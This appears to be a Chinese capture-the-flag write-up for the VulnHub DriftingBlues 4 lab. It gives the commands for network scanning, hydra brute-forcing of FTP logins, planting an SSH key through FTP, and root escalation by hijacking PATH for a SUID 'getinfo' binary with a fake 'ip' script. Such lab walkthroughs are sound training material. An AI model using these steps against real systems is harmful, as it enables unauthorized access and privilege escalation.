一.环境搭建
1.靶场描述
get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.
This works better with VirtualBox rather than VMware.
2.靶场下载
https://www.vulnhub.com/entry/driftingblues-4,661/
data:image/s3,"s3://crabby-images/07fee/07feeae7354c621298c768d0815edacc9d5e8bf0" alt=""
3.靶场启动
data:image/s3,"s3://crabby-images/3989a/3989a61661c2eb0a6c34f86c4026df63e35b1b5f" alt=""
我们不知道靶场ip地址,但是我们知道网段是192.168.1.0/24,我们进行探测即可
二.信息收集
1.寻找靶场真实ip
nmap -sP 192.168.1.0/24
data:image/s3,"s3://crabby-images/1c379/1c37905d7c3b28f5776679de4d92caaa8a0a2231" alt=""
arp-scan -l
data:image/s3,"s3://crabby-images/0d48b/0d48bcfc73df277a0b2effc63425445b96998379" alt=""
靶场的ip地址为192.168.1.10
2.探测端口及服务
nmap -p- -sV 192.168.1.10
data:image/s3,"s3://crabby-images/1e2b7/1e2b7fa9d1472973d89dbc1a5cd78f7ef6d69ada" alt=""
发现开启了21端口, 服务为ftp
发现开启了22端口,服务为OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
发现开启了80端口,服务为Apache httpd 2.4.38 ((Debian))
三.渗透测试
1.访问web服务
http://192.168.1.10
data:image/s3,"s3://crabby-images/560ef/560ef4e938b87f4f90a72f8ce7b0d95457addcfc" alt=""
我们查看页面,没有发现任何有用的信息,我们进行查看源代码,发现一串base64编码,我们一会进行解密查看
data:image/s3,"s3://crabby-images/86bb2/86bb2acbfad99faac8038a159b9bd4258c33eb80" alt=""
开启了21端口,我们进行查看ftp服务,但是不能进行匿名访问
ftp://192.168.1.10
data:image/s3,"s3://crabby-images/d1aa6/d1aa6c9f5f5549b57902de26d019143fe889ffce" alt=""
2.扫描web服务
1)nikto扫描
nikto -h http://192.168.1.10
没有任何信息
2)dirsearch目录扫描
dirsearch -u 192.168.1.10 -e * -x 403 --random-agent
data:image/s3,"s3://crabby-images/cf927/cf9270b560223d30d71d50a82a9417d48f9fc723" alt=""
什么也没有,目前我们掌握的信息,只有一串base64编码,我们进行解密查看
3.渗透测试
1)解密
我们进行解密base64,一共需要解密4次
Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09
data:image/s3,"s3://crabby-images/602a0/602a0afd00edc02a53f8a395bcbfffb6b2b613f6" alt=""
我们发现是一个目录,我们进行访问
http://192.168.1.10/imfuckingmad.txt
data:image/s3,"s3://crabby-images/aa861/aa8616d46b608f05f0cb97b0e65e87356b80b024" alt=""
发现是Brainfuck编码,我们进行解密,发现是一个二维码
data:image/s3,"s3://crabby-images/0d449/0d449051fa6d028f822849cea0792f251d28f8a4" alt=""
2)扫描二维码
我们进行扫描
data:image/s3,"s3://crabby-images/01957/01957d0400e97e01fe5109c0cef28a247194414e" alt=""
data:image/s3,"s3://crabby-images/6db09/6db0971f9e2292c5c114750585cdf8af1cc75cdb" alt=""
我们发现一个网址,我们进行访问发现4个用户名
https://i.imgur.com/a4JjS76.png
data:image/s3,"s3://crabby-images/43ec9/43ec99b1cec8e8e366d364156a2573e3091c4e3a" alt=""
在之前我们访问ftp访问的时候,发现需要用户名进行登录,那么我们进行爆破试试
3)hydra爆破
我们使用hydra进行爆破
hydra -L '/home/kali/桌面/1.txt' -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.10
data:image/s3,"s3://crabby-images/77d1e/77d1e65d599bdd1b4f4865dc1b6c702ed8de6c30" alt=""
破解出一个 FTP登录的用户名和密码:luther/mypics
是 sync(linux同步命令,含义为迫使缓冲块数据立即写盘并更新超级块),那我尝试往 ftp 中的 hubert 文件中写入 ssh 密钥,猜测应该就会同步到 hubert 用户的家目录中,现在 ftp 中的 hubert 目录下创建 .ssh 目录
4)制作ssh私钥
首先先在kaii本地生成秘钥ssh-keygen 将 id_rsa.pub SSH公钥文件另存为 authorized_keys
ssh---keygen -t rsa
data:image/s3,"s3://crabby-images/5c250/5c250f737fd0473d87af04c4fa901381848e6c57" alt=""
data:image/s3,"s3://crabby-images/bbbb8/bbbb8e4168762cf91e7a6973a75ebd719d0c8122" alt=""
data:image/s3,"s3://crabby-images/01df7/01df7d99bb54114696147f882b89a877a11931ac" alt=""
然后我们在hubert目录下创建.ssh目录,我之前就已经创建好了.ssh目录,所以这里就不在创建了
data:image/s3,"s3://crabby-images/602f2/602f2088b51c6dea1dfed78efb9038f9fcdffaa7" alt=""
我们上传authorized_keys到靶场里面,我们可以看到上传成功
data:image/s3,"s3://crabby-images/ba8fe/ba8fe6e8812b97fedd27d131343bfb2ce9fd2906" alt=""
data:image/s3,"s3://crabby-images/14287/1428714b7e8798acaf4ffe48f66b4cc51c38cdf2" alt=""
chmod 400 id_rsa #给权限
5)ssh登录
ssh hubert@192.168.1.10 -i id_rsa
我们可以在user.txt里面,看到第一个flag
6)提权
我们使用命令
find / -perm -u=s -type f 2>/dev/null
data:image/s3,"s3://crabby-images/81c12/81c12ca29db57914f56dc7048c374aa9af3bce98" alt=""
我们可以看到熟悉的getinfo,我们进行提权
执行该程序,根据执行结果发现分别运行了ip addr、cat /etc/hosts、uname -a命令
data:image/s3,"s3://crabby-images/6c76c/6c76c9394b3c29b6d8fdcfdf1c83e8048f34ba95" alt=""
可以通过修改环境来进行命令劫持提权
通过修改环境变量让getinfo在调用命令调用到我们伪造的ip命令(在检索环境时会先调用最前面的环境也就是最新写入的环境),来达到提权的效果
export PATH=/tmp/:$PATH 把/tmp路径写入到系统路径中
cd /tmp
echo '/bin/bash' > ip 把/bin/bash写入到ip文件中(相当于创建ip并写入/bin/bash)
chmod +x ip 给ip文件增加执行权限
data:image/s3,"s3://crabby-images/a1599/a1599bc5dfe8477fcfda8b355bfb7f650e2da023" alt=""
我们可以看到是root提权,我们进行查看flag即可
data:image/s3,"s3://crabby-images/c50f1/c50f1f2135e074dfea699bc977cde7ca4bbf78aa" alt=""